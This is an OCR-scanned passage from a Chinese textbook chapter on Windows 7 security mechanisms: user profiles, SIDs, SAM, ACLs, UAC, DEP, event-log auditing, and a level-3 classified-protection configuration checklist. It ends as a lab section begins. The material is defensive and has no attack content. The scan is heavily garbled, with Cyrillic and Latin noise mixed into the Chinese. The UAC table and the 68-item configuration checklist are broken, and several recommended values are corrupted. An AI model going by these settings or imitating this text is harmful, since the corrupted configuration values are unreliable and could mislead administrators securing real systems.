存储 Cookies. Cookies 中 通常 记录 了 你 的 用 户 ID 口令、 浏览 过 的 网 页 停留 的 时 间 等 信 
息 。 当 你 再 次 访问 该 网 站 时 ,该 网 站 通过 读 取 Cookies, 得 知 你 的 相关 信息 ,不 用 输入 用 
P ID 和 口令 就 能 直接 登录 。 

(3) Desktop 文件 夹 : 包含 用 户 桌面 上 显示 的 内 容 , 例 如 文件 或 快捷 方式 等 。 

(4) Local Settings 文件 夹 : 该 文件 夹 保存 了 应 用 程序 数据 .历史 和 临时 文件 。 应 用 
程序 运行 时 会 自动 读 取 该 文件 夹 中 应 用 程序 的 数据 。 

2) Windows 7 用 户 配置 文件 的 名 称 空间 

Windows XP 的 用 户 配置 文件 同时 保存 了 应 用 程序 和 用 户 数据 ,这 给 漫游 和 重 定向 
操作 带 来 了 风险 和 不 便 。 因 此 ,从 Windows Vista 开始 ,用 户 配 置 文件 的 名 称 空间 有 了 很 
大 变化 ,这 些 变化 主要 有 如 下 几 方 面 。 
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CD 本 地 用 户 配 置 文件 夹 的 位 置 从 “%SystemDrive%\Documents and Settings" f£ 
到 了 “%SystemDrive%\Users” 目 录 下 。 

(2) 为 了 让 应 用 程序 更 好 地 实现 漫游 ,在 AppData 文件 夹 下 新 建 了 三 个 独立 的 子 文 
件 夹 , 分 别 是 Local, Roaming. LocalLow 文件 夹 。 

(3) АП Users 配置 文件 更 名 为 Public, 这 样 可 以 更 好 地 凸显 其 共用 性 。 

(4) Default User 配置 文件 夹 更 名 为 Default ,功能 不 变 。 

2. SID 

Windows 操作 系统 通过 SID 区 分 每 个 登录 用 户 账户 的 权限 。SID 是 标识 用 户 、 组 和 
计算 机 账户 的 唯一 代码 。 它 是 一 个 最 长 为 48 位 的 字符 串 ,包含 用 户 和 组 的 安全 描述 、 
SID 颁发 机 构 ,修订 版 本 和 长 度 可 变 的 验证 值 等 。 首 次 为 用 户 创建 账户 时 ,系统 给 这 个 用 
户 的 账户 生成 一 个 唯一 的 SID。 

在 Windows 7 中 ,要 查看 当前 登录 账户 的 SID, 可 以 使 用 管理 员 身份 启动 命令 提示 窗 
口 ,然后 运行 whoami/user 命令 。Windows XP 默认 安装 中 没有 whoami 程序 ,因此 如 果 
WE Windows XP 下 查看 当前 账户 的 SID, 或 者 在 Windows Vista 和 Windows XP ЕЁ Ж 
看 其 他 账户 的 SID, 可 以 借助 微软 的 一 个 免费 小 工具 PsGetSid, 如 图 4. 1 所 示 。 
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图 4.1 查看 当前 登录 账户 的 SID 


为 了 管理 方便 ,系统 提供 了 一 些 通用 SID。 表 4.1 列 出 了 比较 常见 的 通用 SID。 


表 4.1 常见 通用 SID 


SID 用 户 名 用 途 
S-1-1-0 Everyone 代表 任何 用 户 
S-1-5-8 Anonymous 以 匿名 方式 登录 的 用 户 
S-1-5-32-547 Guests 用 于 临时 或 一 次 性 登录 的 用 户 
3. SAM 


SAM 记录 了 上 账户 名 ` 口 令 的 哈 希 值 等 ,被 称 为 账户 安全 管理 器 。SAM 在 启动 后 就 处 
于 锁定 状态 ,用 户 没有 办 法 擅自 更 改 这 个 文件 的 内 容 。 从 Windows 2000 到 Windows 7. 
SAM 的 功能 变 得 越 来 越 强 大 。 

默认 情况 下 ,SAM 对 用 户口 令 分 别 采取 两 种 算法 进行 加 密 存 储 : 一 种 是 LAN 
Manager(LM) 口 令 散 列 算法 ; 另 一 种 是 加 密 强 度 更 高 的 NT 版 加 密 算法 NTLM, Ei Hi 

用 户 输入 用 户 名 和 口令 后 ,操作 系统 会 将 用 户 名 和 口令 散 列 与 SAM 中 的 凭证 信息 
进行 比较 。 通 过 验证 后 ,系统 登录 进程 会 给 用 户 一 个 访问 令 牌 ,该 令 牌 相当 于 用 户 访问 系 
统 资源 的 票证 。 当 用 户 试图 访问 某 系 统 资 源 时 ,Windows 将 根据 访问 令 牌 检查 该 资源 的 
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访问 控制 列表 (ACL,Access Control List) 。 如 果 令 牌 被 允许 访问 该 资源 ,Windows 会 分 
配给 用 户 适当 的 访问 权限 。 由 于 访问 令 牌 是 用 户 通过 验证 后 由 登录 进程 提供 的 ,所 以 要 
想 改变 用 户 的 权限 需要 注销 后 重新 登录 ,重新 获取 访问 令 牌 。 


4.1.2 访问 控制 


对 计算 机 资源 进行 访问 控制 管理 ,是 Windows 操作 系统 安全 机 制 的 一 个 重要 组 成 部 
分 。Windows 7 采用 访问 控制 列表 (ACL, Access Control. List) 机 制 和 用 户 账 户 控制 
(UAC, User Account Control) 机 制 ,对 账户 能 够 访问 哪些 资源 ,哪些 账户 在 什么 情况 下 
可 以 提升 访问 权限 等 进行 全 面 而 严格 的 规定 和 管控 。 

1。ACL 

ACL 是 一 个 表格 ,记录 用 户 对 系统 中 的 对 象 所 拥有 的 访问 权限 ,常见 的 系统 对 象 有 
文件 .目录 和 注册 表 项 等 ,通常 权限 包括 读 、. 写 和 执行 。Windows 系统 在 用 户 对 系统 对 象 
执行 操作 之 前 ,使 用 可 信 的 系统 组 件 检查 操作 的 访问 权限 。 

如 果 想 设置 和 查看 磁盘 的 访问 权限 ,可 以 右 击 本 地 磁盘 ,例如 С 盘 , 并 选择 “属性 ” 选 
项 ,打开 “本 地 磁盘 (C: ) 属 性 ”对 话 框 。 选 择 “ 安 全 ”选项 卡 , 在 “组 或 用 户 名 ”列表 中 单 击 
用 户 组 Administrators, 可 以 看 到 该 用 户 组 具有 对 磁盘 (C: ) 的 完全 控制 权 , 单 击 “ 组 或 用 
户 名 ”下 的 Users 时 ,如 图 4. 2 所 示 ,Users 用 户 仅 具有 “ 读 取 和 执行 、 列 出 文件 夹 类 型 . 读 
取 ” 的 权限 。 单 击 “ 高 级 "将 显示 出 该 用 户 组 的 详细 视图 。 


I 


常规 
安全 
对 象 名 称 : CA 


组 或 用 户 名 (6); 

BR Authenticated Users 

fa srsrEM 

94, Administrators (sas-PC\Adninistrators) 


Users (sas-Pi Б] 


要 更 改 权限 ， 请 单 击 “编辑 ”* 


Users 的 权限 人) 
完全 控制 
修改 


读 取 和 执行 
列 出 文件 夹 内 容 
E 


EA 
本 权限 或 高 级 设置， 请 单 击 “ 高 (mmo 


取消 Е (А) 


图 4.2 用 户 访问 权限 


2. UAC 
在 Windows Vista 之 前 ,使 用 Windows 的 很 多 用 户 都 直接 以 管理 员 权 限 运 行 系统 ， 
这 对 计算 机 安全 构成 很 大 隐患 。 从 Windows Vista 开始 , Windows 加 强 了 对 用 户 账户 控 
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制 的 管理 ,使 用 “用 户 账户 控制 "(User Account Control, UAC) 模 块 来 管理 和 限制 用 户 
权限 。 

和 老 版 本 的 Windows 有 很 大 不 同 , 在 Windows Vista, Windows 7 等 中 , 当 用 户 使 用 
管理 员 账 户 登 录 时 ,Windows 会 为 该 账户 创建 两 个 访问 令 牌 : 一 个 标准 令 牌 ; 一 个 管理 
员 令 牌 。 大 部 分 时 候 , 当 用 户 试 图 访问 文件 或 运行 程序 的 时 候 , 系 统 都 会 自动 使 用 标准 令 
牌 进行 ,只 有 在 权限 不 足 ( 也 就 是 说 ,如 果 程 序 宣称 需要 管理 员 权 限 的 时 候 ) 时 ,系统 才 会 
使 用 管理 员 令 牌 ,这 种 将 管理 员 权限 区 分 对 待 的 机 制 称 为 UAC。UAC 体现 了 最 小 特权 
原则 , 即 在 执行 任务 时 使 用 尽 可 能 少 的 特权 。 

在 需要 管理 员 特 权 操作 时 ,系统 首先 会 弹出 UAC 对 话 框 要 求 用 户 确认 (如 果 当 前 登 
录 的 是 管理 员 用 户 ), 如 图 4. 3 所 示 ,或 者 输入 管理 员 用 户 的 密码 (如 果 当 前 登录 的 是 标准 
用 户 ,也 称 为 受 限 用 户 )。 只 有 在 提供 了 正确 的 登录 凭据 后 ,系统 才 允 许 使 用 管理 员 令 牌 
访问 文件 或 运行 程序 ,这 个 要 求 确认 或 者 输入 管理 员 账 户 密码 的 过 程 称 为 “提升 ”。 


图 4.3 UAC 用 户 确 认 对 话 框 


根据 以 管理 员 身 份 运行 的 程序 的 不 同 ,“ 提 升 ” 对 话 框 项 部 一 栏 的 底 色 也 不 同 , 底 色 和 
对 应 的 含义 如 表 4. 2 所 示 。 


R42 UAC 对 话 框 背景 含义 


背景 颜色 а X 
а ЭТТЕРГЕ SEIL ETOP TEE sx 
红色 背景 , 带 有 红色 盾牌 图 标 ‚тылтан аиынан ЕБИНЕ 
要 万 分 小 心 

3 _ | 程序 不 被 本 地 计算 机 信任 (主要 是 因为 不 包含 可 信任 的 数字 签名 
橘 黄色 背景 , 带 有 红色 盾牌 图 标 或 数字 签名 损坏 ) 
蓝 绿色 背景 程序 是 微软 自 带 的 , 带 有 微软 的 数字 签名 
灰色 背景 程序 带 有 可 信任 的 数字 签名 


UAC 功能 在 一 定 程度 上 增强 了 系统 安全 性 ,但 是 在 执行 很 多 操作 的 时 候 都 需要 进行 
确认 ,也 带 来 了 使 用 上 的 烦琐 。 在 Windows 7 系统 中 可 以 根据 系统 所 处 的 环境 状况 , 设 
置 UAC 的 安全 级 别 , 使 得 在 利用 UAC 确保 系统 安全 的 同时 ,使 用 上 更 加 易于 接受 。 使 
用 管理 员 账 户 登录 Windows 7, 打 开 控 制 面板 ,在 控制 面板 中 依次 单 击 用 户 账户 、 更 改 用 
户 账户 控制 设置 ,在 如 图 4.4 所 示 的 界面 中 ,通过 滑 块 调整 UAC 的 提示 级 别 ,系统 中 提 
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供 了 四 个 级 别 , 从 上 到 下 安全 性 递减 ,同时 ,扰民 ?的 程度 也 是 递减 的 。 


图 4.4 UAC 级 别 设置 


不 同 级 别 之 间 的 区 别 , 以 及 建议 的 使 用 环境 可 参考 表 4. 3。 
表 4.3 UAC 各 级 别 使 用 场景 


| 是 否 使 用 
ж ж ж ж 适用 场景 ea 
当 程 序 试图 安装 软件 ,或 更 改 计 | 如 果 项 望 尽 可 能 保证 计算 机 安全 ,用 
始终 通知 。 “| 算 机 设置, 或 用 户 更 改 Windows | 户 需要 频繁 安装 软件 ,以 及 访问 不 熟 | ”是 
设置 时 ,通知 当前 用 户 悉 的 网 站 时 ,可 使 用 该 选项 
只 有 在 程序 试图 修改 计算 机 配 | 如 果 计 算 机 需要 较 高 的 安全 等 级 ,并 
RUM 置 时 通知 当前 用 户 ,但 用 户 自己 | 希望 降低 用 户 可 以 看 到 的 通知 数量 | 5 
更 改 Windows 设置 时 不 通知 | 时 ,可 选择 该 选项 
ЕТТЕ o 
更 改 计算 机 时 | 与 默认 值 相同 ,但 显示 通知 时 | 如 果 用 户 在 可 信赖 环境 中 工作 ,只 使 
用 熟悉 的 应 用 程序 ,不 访问 不 熟悉 的 | T 
通知 (不 降低 | UAC 不 切换 到 安全 桌面 ооз 
桌面 亮度 ) ` 
如果 安全 性 并 不 是 最 重要 的 ;并且 用 
从 不 通知 。 | 关闭 UAC 所 有 的 提示 通知 。 “| 户 在 可 信赖 环 境 中 工作 ,同时 使 用 由 | д 


于 不 支持 UAC 而 无 法 获得 Windows 7 
认证 的 程序 . 即 可 使 用 该 选项 
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Windows 7 默认 UAC 级 别 是 第 三 级 ,在 该 级 别 下 , 当 弹 出 UAC 提升 对 话 框 时 ,桌面 
背景 会 变 暗 ,这 就 是 所 谓 的 “安全 桌面 ”, 这 样 做 的 主要 目的 不 是 为 了 突出 显示 UAC 的 对 
话 框 , 而 是 为 了 安全 ,除了 受信 任 的 系统 进程 外 ,任何 用 户 级 别 的 进程 都 无 法 在 安全 桌面 
上 运行 ,这 样 可 以 阻止 恶意 程序 的 仿冒 攻击 。 


4.1.3 入 侵 防范 


1. 浏览 器 保护 模式 

浏览 器 保护 模式 有 助 于 阻止 攻击 者 算 改 浏览 器 设置 .防止 攻击 者 通过 提升 特权 来 执 
行 恶意 代码 ,使 用 户 获 得 更 安全 的 上 网 体验 。 

保护 模式 通过 禁止 使 用 浏览 器 的 扩展 来 消除 恶意 代码 静默 安装 的 可 能 性 ,有 效 减 少 
存在 于 这 些 扩展 中 的 软件 漏洞 。 软 件 开 发 商 只 有 基于 “保护 模式 ”应 用 程序 编程 接口 开发 
IE 的 扩展 程序 或 加 载 项 ,才能 不 被 保护 模式 禁止 。 保 护 模式 将 控制 这 些 扩展 程序 或 加 载 
项 与 文件 系统 ,注册 表 等 进行 交互 。 在 保护 模式 下 ,IE 以 较 低 的 权限 运行 ,从 而 阻止 用 户 
更 改 系统 文件 或 设置 ,或 者 在 用 户 未 知情 况 下 对 系统 文件 或 设置 进行 更 改 。 

2. РЕР 

DEP Ж Windows 的 一 项 安全 机 制 ,主要 防止 缓冲 区 溢出 攻击 对 系统 造成 破坏 。 操 
作 系 统 从 Windows XP SP2 开始 引入 该 项 技术 ,并 一 直 延 续 到 此 后 的 Windows Server 
2003、Windows Server 2008 等 版 本 中 。 在 Windows 7 中 ,DEP 也 作为 一 项 安全 机 制 被 保 
留 下 来 。 

缓冲 区 溢出 一 直 是 操作 系统 和 应 用 软件 存在 的 安全 风险 , Windows 7 也 不 例外 。 攻 
击 者 利用 系统 存在 的 缓冲 区 溢出 漏洞 ,在 系统 运行 的 内 存 缓冲 区 写 和 人 可 执行 的 恶意 代码 ， 
然后 诱骗 程序 执行 恶意 代码 ,从 而 达到 控制 系统 的 目的 。 使 用 DEP 的 目的 是 阻止 恶意 插 
入 代码 的 执行 。 其 运行 机 制 是 ,Windows 利用 DEP, 将 只 包含 数据 的 内 存 位 置 标记 为 不 
可 执行 区 (NX, No Execute), 当 应 用 程序 试图 从 标记 为 NX 的 内 存 位 置 执行 代码 时 ， 
Windows 的 DEP 逻辑 将 阻止 应 用 程序 这 样 做 ,从 而 保护 系统 防止 溢出 。 

DEP 技术 分 为 两 种 : 硬件 强制 DEP 和 软件 强制 DEP。 硬 件 强制 DEP 需要 处 理 器 的 
支持 ,目前 大 多 数 处 理 器 都 支持 DEP。 软 件 强制 DEP 主要 通过 在 系统 内 存 中 为 保存 的 
数据 对 象 自动 添加 一 组 特殊 指针 防止 某 些 类 型 的 攻击 。 

如 何 对 DEP 功能 进行 配置 呢 ? 第 一 步 , 右 击 桌面 上 “计算 机 ”图 标 ,选择 “属性 ”选项 ， 
弹出 “系统 ”视窗 。 第 二 步 , 在 “系统 ”视窗 中 , 单 击 “ 高 级 系统 设置 "选项 ,打开 “系统 属性 ” 
面板 。 第 三 步 , 在 “系统 属性 ”面板 中 ,选择 “高 级 ”选项 卡 . 单 击 “ 性 能 " 框 中 的 “设置 "按钮 ， 
打开 “性 能 选项 ”面板 。 第 四 步 , 在 “性 能 选项 ”面板 中 ,选择 “数据 执行 保护 ”选项 卡 , 即 可 
得 到 如 图 4.5 所 示 的 “数据 执行 保护 性 能 设置 ”面板 。 在 这 个 面板 中 ,我 们 可 确认 处 理 器 
是 否 支持 DEP。 如 果 支 持 会 在 底部 显示 “您 的 计算 机 处 理 器 支持 基于 硬件 的 DEP”, 反 之 
会 显示 “您 的 计算 机 处 理 器 不 支持 基于 硬件 的 DEP”。 但 是 Windows 可 以 启用 DEP 软件 
保护 功能 避免 系统 遭受 某 些 类 型 的 攻击 。 在 这 个 面板 中 ,我 们 还 可 以 选择 启用 DEP 的 
Ээ 
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marlen [fene] A 


ФЕР) Н 
dq ЗААНА 
d a Windows 程序 和 服务 启用 DEP Т) 
Ө 为 除 下 列 选 定 程序 之 外 的 所 有 程序 和 服务 启用 DEP QD 


o) [Шй® ) 
您 的 计算 机 处 理 器 支持 基于 硬件 的 DEP。 


取消 应 用 以 ) 


4.1.4 安全 审计 


Windows 系统 安全 审计 主要 通过 记录 日 志文 件 实 现 。 日志 文件 中 详细 记录 了 
Windows 系统 及 其 各 种 服务 程序 运行 的 细节 。 系 统 出 现 问 题 时 ,就 在 日 志文 件 中 留 下 一 
条 记录 。 日 志文 件 可 供 日 后 进行 追溯 和 审计 。 下 面 就 如 何 查看 和 修改 Windows 日 志 
件 进 行 介绍 。 

1. 什么 是 日 志文 件 

日 志文 件 是 Windows 系统 中 一 种 比较 特殊 的 文件 , 它 记录 着 Windows 系统 所 发 生 

一 切 活 动 ,如 各 种 系统 服务 的 启动 .运行 ,关闭 等 信息 。Windows 日 志文 件 包括 应 用 程 
序 安 全 、 系 统 等 几 个 部 分 , 它 的 存放 路 径 是 “%systemroot%\system32\config”。 应 用 程 
序 日 志 、 安 全 日 志和 系统 日 志 对 应 的 文件 名 分 别 为 AppEvent. evt、SecEvent. evt 和 
SysEvent. evt。 这 些 文件 受到 事件 日 志 服 务 (Event Log) 的 保护 ,不 能 被 删除 ,但 可 以 被 
清空 。 

CD 系统 日 志 。 包 含 由 Windows 系统 组 件 产生 的 事件 。 系 统 日 志 主 要 记录 的 信息 
包括 驱动 程序 产生 的 信息 、 系 统 组 件 产生 的 信息 。 

(2) 应 用 程序 日 志 。 指 的 是 Windows 上 的 应 用 程序 产生 的 日 志 。 这 里 的 应 用 程序 
一 般 指 的 是 微软 开发 的 应 用 程序 。 第 三 方 开 发 的 基于 Windows 系统 的 应 用 程序 如 果 使 
用 Windows 日 志 记 录 的 函数 , 则 这 个 应 用 程序 也 可 以 通过 事件 查看 器 查看 其 日 志 信 息 。 

G) 安全 性 日 志 。 记 录 诸 如 有 效 和 无 效 的 登录 尝试 以 及 与 资源 使 用 相关 的 事件 , 例 
如 创建 ,打开 或 删除 文件 或 其 他 对 象 。 
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2. 怎样 查看 日 志文 件 


在 Windows 系统 中 查看 日 志文 件 很 简单 ,可 以 通过 “控制 面板 ”>“ 管 理工 具 ”>“ 事 
件 查 看 器 "来 浏览 这 些 日 志文 件 中 的 内 容 , 如 图 4.6 所 示 。 在 事件 查看 器 窗口 的 左 栏 中 列 
出 了 本 机 包含 的 所 有 日 志 类 型 ,如 应 用 程序 、 安 全 和 系统 等 。 查 看 日 志 记 录 也 很 简单 ,在 
左 栏 中 选中 某 个 类 型 的 日 志 , 中 间 栏 中 列 出 该 类 型 日 志 的 所 有 记录 ,鼠标 左 键 双击 其 中 某 
个 记录 ,弹出 “事件 属性 ”对 话 框 ,显示 出 该 记录 的 详细 信息 ,这 样 我 们 就 能 准确 掌握 系统 
中 到 底 发 生 了 什么 事件 ,这 些 事件 是 否 会 影响 Windows 的 正常 运行 。 一 旦 出 现 问 题 , 我 
们 也 能 根据 日 志 及 时 排查 。 
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图 4.6 Windows 事件 查看 器 


3. 怎样 修改 日 志文 件 大 小 
Windows 日 志文 件 默认 大 小 有 限 ,开启 日 志 审 计 功能 后 ,系统 可 能 会 在 某 一 天 提示 
“系统 日 志 已 满 ,请 与 管理 员 联 系 ”。 修 改 日 em 存储 空间 ,修改 
方法 很 简单 。 例 如 ,修改 “安全 ”类 型 日 志文 件 大 小 的 方法 是 ,在 事件 查看 器 窗口 的 左 栏 中 
选中 安全 类 型 的 日 志 , 如 图 4.6 所 示 。 在 右 侧 “操作 ” 栏 中 单 击 “ 属 性 ”选项 ,进入 “日 志 属 
性 ”界面 。 在 这 个 界面 中 ,可 以 调整 “最 大 日 志文 件 大 小 ”, 设 置 “ 当 达到 最 大 日 志 大 小 时 ” 
的 处 理 方式 。 
另外 ,我 们 也 可 以 直接 在 注册 表 中 修改 日 志文 件 大 小 ,方法 是 : 鼠标 单 击 “ 开 始 ”, 运 行 
regedit, 进 入 注册 表 编 辑 器 ,在 “HKEY_LOCAL_MACHINE/SYSTEMVCurrentControlSet/ 
Services/Eventlog” 项 下 ,找到 Application, Security 和 System 3 个 子 项 ,就 可 以 修改 日 
志文 件 大 小 。 
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4.2 Windows 安全 配置 基本 要 求 


做 好 终端 安全 配置 工作 的 关键 在 于 充分 利用 上 述 安 全 机 制 ,对 影响 系统 安全 性 的 关 
键 配置 项 进行 合理 配置 ,限制 或 禁止 存在 安全 隐患 的 软件 模块 发 挥 作用 ,启用 或 加 强 系统 
的 安全 保护 功能 ,增强 计算 机 抵抗 安全 风险 的 能 力 。 

我 国信 息 系统 等 级 保护 标准 对 主机 安全 和 应 用 安全 提出 了 明确 的 要 求 , 包 括 身份 鉴 
别 、 访 问 控制 .安全 审计 、 剩 余 信息 保护 .入侵 防范 .资源 控制 等 方面 。 根 据 等 级 保护 标准 
要 求 , 对 Windows 安全 配置 的 基本 要 求 主要 分 为 以 下 6 类 。 

1. 账户 配置 要 求 

账户 配置 要 求 是 针对 用 户 账户 信息 保护 提出 的 安全 配置 要 求 ,主要 用 于 加 强 对 用 户 
账户 信息 的 管理 ,防止 攻击 者 暴力 猜测 用 户口 令 或 者 非法 窃取 账户 信息 。 主 要 包括 锁定 
阅 值 .账户 锁定 时 间 和 复位 账户 锁定 计数 器 三 个 配置 项 。 

2. 口令 配置 要 求 

口令 配置 要 求 是 针对 用 户口 令 的 长 度 、 复 杂 度 及 使 用 期 限 等 提出 安全 配置 要 求 ,防止 
口令 设置 过 于 简单 导致 的 非法 入 侵 事 件 。 

з. 用 户 权限 配置 要 求 

用 户 权 限 配置 要 求 是 针对 本 机 用 户 及 用 户 组 对 系统 资源 的 访问 权限 提出 的 安全 配置 
要 求 , 包 括 远程 访问 、 创 建 和 访问 文件 对 象 .加 载 设备 驱动 .执行 系统 任务 等 。 

4. 审核 和 日 志 配置 要 求 

审核 和 日 志 配 置 要 求 是 针对 系统 日 志 中 所 记录 的 事件 和 审计 方式 提出 的 安全 配置 
要 求 , 可 通过 配置 加 强 日 志 审 计 , 详 细 记 录 系 统 操作 ,以 便 通过 日 志 对 安全 事件 进行 
溯源 。 

5. 安全 选项 配置 要 求 

安全 选项 配置 要 求 是 针对 操作 系统 组 策略 编辑 器 (gpedit. msc) 中 的 安全 选项 策略 提 
出 的 配置 要 求 ,包括 用 户 账 户 控制 Microsoft 网 络 服务 器 、 关 机 恢复 控制 台 、 交 互 式 登 
录 、 设 备 、 网 络 安全 等 方面 的 要 求 。 

6. 组 件 配 置 要 求 

组 件 配置 要 求 是 针对 用 户 安装 的 操作 系统 组 件 提出 的 安全 配置 要 求 。 主 要 包括 IE 
管理 .附件 管理 .电源 管理 .显示 管理 、 会 话 服务 .系统 服务 和 网 络 服务 等 方面 的 配置 要 求 。 

表 4.4 汇 总 了 适合 等 级 保护 第 三 级 的 Windows 7 安全 配置 清单 。 


表 4.4 适合 等 级 保护 第 三 级 的 Windows 7 安全 配置 清单 


序号 | 类 Ж 要 Ж 配 置 项 推荐 配置 值 
应 指定 锁定 账户 之 前 允许 连续 E 
i = os 尝试 登录 的 次 数 账户 锁定 阔 值 5 次 
2 应 指定 账户 锁定 时 间 账户 锁定 时 间 30 分 钟 
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续 表 
序号 | 类 别 要 求 配 置 项 推荐 配置 值 
3 应 指定 口令 最 长 使 用 期 限 口令 最 长 使 用 期 限 90 天 
4 应 指定 口令 最 短 使 用 期 限 口令 最 短 使 用 期 限 1X 
5 mn ^mRm* 应 设置 重复 口令 的 间隔 强制 口令 历史 5 次 
6 „м 应 指定 口令 长 度 最 小 值 口令 长 度 最 小 值 8 个 字符 
7 口令 应 该 达到 一 定 的 复杂 度 | 口令 复杂 性 要 求 启用 
应 禁用 可 还 原 的 口令 加 密 存 储 | 用 可 还 原 的 口令 加 密 存 禁用 
方式 储 方式 
Administrator、Local 
9 应 指定 可 为 进程 调整 内 存 配额 |, 尘 各 调整 内 存 配额 | Service, Network 
的 用 户 и 
Ѕегуісе 
Network Service, 
10 应 限定 以 服务 方式 登录 的 账户 | 作为 服务 登录 В 
Local Service 
ii 应 限定 以 远程 桌面 方式 登录 的 | 允许 通过 远程 桌面 方式 PLN 
账户 登录 
12 应 指定 不 能 以 批 处 理 作 业 方式 | 拒绝 作为 批 处 理 作 业 | Guest, Support 
登录 的 账户 登录 388945a0 
Administrators、 
13 应 限定 可 创建 全 局 对 象 的 账户 | 创建 全 局 对 象 Local Service, Network 
Service, Service 
应 限定 可 以 管理 审核 对 象 和 安 " ; ы xu | 
14 全 日 志 的 账户 管理 审核 和 安全 日 志 Administrators 
15 ткен 配置 文件 系统 性 能 。 | Administrators 
[ 只 有 管理 远程 访问 
16 | 用 户 权限 配 т E 从 网 络 访问 此 计算 机 | Administrators 
17 к= 应 指定 只 有 管理 员 可 远程 关机 | 从 远程 系统 强制 关机 Administrators 
18 eb аа 创建 一 个 页 面 Administrators 
Е 应 指定 只 有 管理 员 才 能 安装 和 ПЖ A n dA UE d К ah ГРОТ 
ШУ {АК ЕЛ 程序 
2n 应 指定 只 有 管理 员 可 以 获得 文 | 取得 文件 或 其 他 对 象 的 А 
件 或 其 他 对 象 的 所 有 权 所 有 权 
21 эл инш 可 以 备份 广 备份 文件 和 目录 Administrators 
应 指定 只 有 管理 员 可 以 执行 卷 |，,_ ы . 
22 维护 任务 执行 卷 维 护 任务 Administrators 
23 xc 可 以 设 定 进 提高 计划 优先 级 Administrators 
24 MEROHER ace 更 改 系统 时 间 Administrators 
统 时 间 
25 应 指定 只 有 管理 员 可 以 调试 内 可 调式 程序 Administrators 


核 程序 
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续 表 
序号 | ж m 要 R 配置 项 推荐 配置 什 
26 应 对 账户 管理 事件 进行 审核 “| 审核 账户 管理 Т eU 
27 Il m 审核 特权 使 用 失败 时 审核 
28 应 对 登录 事件 进行 审核 审核 登录 事件 ed ni: 
29 | 审核 及 日 志 | 应 对 策略 更 改 事件 进行 审核 “| 审核 策略 更 改 成 功 时 审核 
зо | 配置 要 求 — | 应 对 系统 事件 进行 审核 审核 系统 事件 成 功 时 审核 
з1 е 文件 的 | 应 用 程序 日 志 最 大 值 | вомв 
32 应 指定 安全 日 志文 件 的 大 小 “| 安全 日 志 最 大 值 80MB 
33 应 指定 系统 日 志文 件 的 大 小 “| 系统 日 志 最 大 值 80MB 
志文 件 写 满 后 应 * 

34 Lon oT MOS 保留 旧事 件 禁用 
35 应 重 命 名 系统 管理 员 账 户 重 命名 系统 管理 员 账 户 | Administrator 
36 JA HD S Mc KERE 禁用 
37 应 禁止 安装 未 签名 的 驱动 程序 „ле 禁止 安装 
38 应 禁止 在 登录 界面 显示 用 户 名 | 交互 式 登录 启用 

应 按 Ctrl 二 Alt 十 Del 组 合 键 进 | 交互 式 登录 : 禁止 按 Cur 
39 信安 全 的 登录 界面 十 Alt 十 Del 组 合 键 切 换 | 禁用 

到 系统 登录 
„л. аи, 试图 登录 | 本 系统 仅 供 授权 用 户 
40 应 向 登录 用 户 提示 和 殴 示 信息 。 | 的 用 户 消息 叉 本 мө 
2 ВЕНЕ ЖЕ БОЕ ЖОШ (ЖС Ё SAM Ж Е 
安全 选项 配 | 名 称 名 枚 举 

uo BR ШЕУ ИНУ GE | 将 Everyone 权限 应 用 于 | 

Everyone 权限 匿名 用 户 
Р Бнз ОШЕН ЗЕЙНЕ гаа 

全 模式 模型 b 
ü 应 指定 更 安全 的 口令 加 密 存储 EF КГС ФР Lo 

方式 存储 LAN 管理 器 哈 希 值 
45 е оаа 清除 虚拟 内 存 页 面 文件 | 启用 
P 如果 无 法 审核 事件 应 立即 关闭 | 如 果 无 法 记录 安全 审核 | 用 

系统 则 立即 关闭 系统 
m 超过 登录 时 间 后 应 强制 注销 | 在 超过 登录 时 间 后 强制 | 


登录 


注销 系统 
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续 表 
序号 | 类 别 = ож 配置 项 推荐 配置 什 
ny жк IE 动 安 
18 кзы 浏览 器 自动 安装 | 禁止 IE 自动 安装 组 件 | 启用 
" RERUM IP ЕЛЕЕ МИШ (ЧЕ E DOR 禁止 用 户 添 | y 
删除 网 址 加 或 删除 站 点 i 
安全 区 域 : 禁 更 
50 应 禁止 用 户 更 改 安全 区 域 策略 ы ERPE a 
m" IE | 应 禁止 无 效 签名 的 软件 运行 或 允许 运行 或 安装 软件 , 即 | 语 
` 管理 安装 使 签名 无 效 i 
52 “| 应 禁止 第 三 方 浏览 器 扩展 ”| 允许 第 三 方 浏览 器 扩展 | 禁用 
53 应 限制 活动 脚本 允许 活动 脚本 禁用 
应 限制 下 载 未 签名 的 Active [FRR E M Ламе, 
i 控件 控件 i 
55 应 禁用 Java 权限 Java 权限 禁用 
56 应 使 用 弹出 窗口 阻止 程序 ” ”| 使 用 弹出 窗口 阻止 程序 | 启用 
57 应 限制 存储 用 户 数据 持续 使 用 用 户 数据 禁用 
ЫБ 附件 | 打开 附件 之 前 应 进行 防 病毒 打开 附件 时 通知 防 病毒 | 用 
i 管理 | 检查 程序 
so [agg | 电源 | 系统 从 休眠 或 挂 起 状态 唉 醒 时 | 从 休眠 或 挂 起 状态 唤醒 | -y 
А ки аА 时 提示 输入 口令 
系统 从 屏保 状态 唤醒 时 应 提示 | 人、 . 
60 | 要 求 显示 | 输入 口令 口令 屏幕 保护 程序 启用 
в SOR НЕ ERER EEEE ҮТҮ ДЕК 
待 时 间 
指定 断 开 连接 的 终端 服 
Т 会 话 的 最 长 时 4 
62 应 指定 会 话 的 最 长 时 间 ЖКНЫН 148b 
ds 会 话 | 应 指定 会 话 在 经 过 一 定 空闲 时 | 为 活动 但 空 亲 的 终端 服 | 1。 分 名 
服务 | 间 后 自动 断 开 务 会 话 设置 时 间 限 制 
应 指定 客户 端 连 接 时 采用 高 级 | 设置 客户 端 连接 加 密 
64 к жй 启用 高 级 别 
应 限制 未 验证 的 远程 进程 调用 ИИИ 
65 (RPC, Remote Procedure Call) éd аш ОЕР 已 验证 
ga | 客户 端 连接 
66 应 禁止 远程 协助 提供 远程 协助 禁用 
67 应 限制 请 求 远程 协助 请 求 远程 协助 禁用 
Windows 防火 墙 : 允许 
共 禁 
68 应 限制 文件 和 打印 机 共享 。 | 文件 和 打印 机 关 训 用 
网 络 | 应 禁止 在 网 络 上 安装 和 配置 | 禁止 在 你 的 DNS 域 网 络 | 
服务 | 网 桥 上 安装 和 配置 网 桥 ü 
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4.3 Windows 账户 和 口令 的 安全 设置 实验 


4.3.1 实验 目的 


了 解 Windows 密码 策略 和 锁定 策略 的 主要 内 容 和 用 途 ,掌握 Windows 安全 策略 配 
置 方法 。 


4.3.2 实验 内 容 及 环境 


